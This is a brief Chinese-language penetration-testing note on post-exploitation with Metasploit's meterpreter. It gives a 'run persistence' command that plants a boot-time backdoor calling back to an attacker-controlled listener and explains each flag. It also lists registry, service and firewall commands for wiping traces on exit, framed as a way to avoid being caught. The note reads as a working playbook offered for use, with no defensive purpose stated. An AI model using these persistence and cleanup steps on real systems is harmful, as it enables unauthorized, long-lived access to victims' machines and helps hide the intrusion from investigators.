# 渗透测试

外围打点对我没有什么价值,直接无脑梭哈

后渗透有些参考

当植入 meterpreter 后需要植入后门

run persistence -X -i 5 -p 443 -r 127.0.0.1

命令语法:

A:自动启动Payload程序
S:系统登录时自动加载
U:用户登录时自动启动
X:开机时自动加载
i:回连的时间间隔
P:攻击者监听反向连接端口号
r:攻击者机器 IP 地址(攻击主机)

留下后门后会重置当前 session 为后门会话

可以通过使用 exploit/multi/hadler 进行监听,从而重新获得会话。

撤离的时候需要执行一些清理操作,以免被查水表

# 如果渗透时开启过rdp,可以用下面的恢复
meterpreter > reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
meterpreter > execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
meterpreter > execute -H -f cmd.exe -a "/c sc stop termservice"
meterpreter > execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
还需要执行persistence时,程序预留的痕迹清理
路径会在运行的时候给出,只需要run一下就行